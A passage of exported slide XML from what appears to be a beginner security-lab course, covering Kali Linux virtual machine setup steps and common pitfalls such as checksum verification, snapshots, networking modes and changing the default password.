              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="712" name="Google Shape;712;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5232654" y="271576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VM Settings &gt; System &gt; New &gt; Serial &gt; Save. The main display blacks out during install. The serial console shows it instead</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="713" name="Google Shape;713;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="318897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14" name="Google Shape;714;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="3363849"/>
            <a:ext cx="301752" cy="30175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15" name="Google Shape;715;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="336384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5</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="716" name="Google Shape;716;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014984" y="327812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Set resources</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="717" name="Google Shape;717;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014984" y="350443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2-4 GB RAM and 20+ GB disk is a comfortable starting point</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="718" name="Google Shape;718;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4697730" y="318897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19" name="Google Shape;719;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4834890" y="3363849"/>
            <a:ext cx="301752" cy="30175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20" name="Google Shape;720;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4834890" y="336384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6</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="721" name="Google Shape;721;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5232654" y="327812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Install, then clean up</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="722" name="Google Shape;722;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5232654" y="350443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Boot and install over the serial console, clear the ISO so it won't reboot into setup again, then remove the Serial device you added</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="723" name="Google Shape;723;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="3977640"/>
            <a:ext cx="4011930" cy="651510"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 84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24" name="Google Shape;724;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="4152519"/>
            <a:ext cx="301752" cy="301752"/>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25" name="Google Shape;725;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="4152519"/>
            <a:ext cx="301752" cy="30175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100"/>
              <a:buFont typeface="Cambria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="726" name="Google Shape;726;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014984" y="4066794"/>
            <a:ext cx="332613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Log in and update</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="727" name="Google Shape;727;p36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1014984" y="4293108"/>
            <a:ext cx="3326130" cy="2880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Default credentials are kali / kali, then run apt update &amp;&amp; apt upgrade</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="728" name="Google Shape;728;p36"/>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Setup guide: UTM</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="729" name="Google Shape;729;p36"/>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34" name="Shape 734"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="735" name="Google Shape;735;p37"/>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COMMON PITFALLS</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="736" name="Google Shape;736;p37"/>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Common pitfalls</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="737" name="Google Shape;737;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="1405890"/>
            <a:ext cx="264033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38" name="Google Shape;738;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="1556766"/>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39" name="Google Shape;739;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="684428" y="1610258"/>
            <a:ext cx="304496" cy="304495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="740" name="Google Shape;740;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="2036826"/>
            <a:ext cx="236601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Enable virtualization in BIOS/UEFI</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="741" name="Google Shape;741;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="2366010"/>
            <a:ext cx="2366010" cy="4800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Intel VT-x or AMD-V must be turned on, or your hypervisor won't start VMs at all.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="742" name="Google Shape;742;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3326130" y="1405890"/>
            <a:ext cx="264033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43" name="Google Shape;743;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3477006" y="1556766"/>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44" name="Google Shape;744;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3530498" y="1610258"/>
            <a:ext cx="304496" cy="304495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="745" name="Google Shape;745;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463290" y="2036826"/>
            <a:ext cx="236601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Don't starve the VM</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="746" name="Google Shape;746;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463290" y="2366010"/>
            <a:ext cx="2366010" cy="4800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2 GB RAM is a bare minimum for Kali's desktop; 4 GB+ feels much better.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="747" name="Google Shape;747;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="1405890"/>
            <a:ext cx="264033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48" name="Google Shape;748;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6323076" y="1556766"/>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49" name="Google Shape;749;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6376568" y="1610258"/>
            <a:ext cx="304495" cy="304495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="750" name="Google Shape;750;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="2036826"/>
            <a:ext cx="236601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Snapshot before you break things</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="751" name="Google Shape;751;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="2366010"/>
            <a:ext cx="2366010" cy="4800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Every hypervisor here supports snapshots. Take one before trying anything risky.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="752" name="Google Shape;752;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="3051810"/>
            <a:ext cx="264033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53" name="Google Shape;753;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630936" y="3202686"/>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54" name="Google Shape;754;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="684428" y="3256178"/>
            <a:ext cx="304496" cy="304496"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="755" name="Google Shape;755;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="3682746"/>
            <a:ext cx="236601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NAT vs. Bridged networking</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="756" name="Google Shape;756;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="4011930"/>
            <a:ext cx="2366010" cy="4800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NAT is simplest and safest to start; Bridged puts your VM directly on the LAN, useful later.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="757" name="Google Shape;757;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3326130" y="3051810"/>
            <a:ext cx="264033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58" name="Google Shape;758;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3477006" y="3202686"/>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59" name="Google Shape;759;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3530498" y="3256178"/>
            <a:ext cx="304496" cy="304496"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="760" name="Google Shape;760;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463290" y="3682746"/>
            <a:ext cx="236601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Only download from kali.org</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="761" name="Google Shape;761;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463290" y="4011930"/>
            <a:ext cx="2366010" cy="4800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Verify the SHA256 checksum every time. A tampered image is a real attack vector.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="762" name="Google Shape;762;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="3051810"/>
            <a:ext cx="2640330" cy="1474470"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 3721" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F8F3EA"/>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63" name="Google Shape;763;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6323076" y="3202686"/>
            <a:ext cx="411480" cy="41148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64" name="Google Shape;764;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6376568" y="3256178"/>
            <a:ext cx="304495" cy="304496"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="765" name="Google Shape;765;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="3682746"/>
            <a:ext cx="236601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900"/>
              <a:buFont typeface="Cambria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="1B1E1D"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>Change the default password</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="766" name="Google Shape;766;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="4011930"/>
            <a:ext cx="2366010" cy="4800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6B6560"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="6B6560"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>kali/kali is public knowledge. Change it the moment you log in.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="767" name="Google Shape;767;p37"/>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Common pitfalls</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="768" name="Google Shape;768;p37"/>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773" name="Shape 773"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="774" name="Google Shape;774;p38"/>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PRACTICAL STEP ONE</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="775" name="Google Shape;775;p38"/>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100"/>
              <a:buFont typeface="Cambria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="2100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>Connecting to the Range from your new VM</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
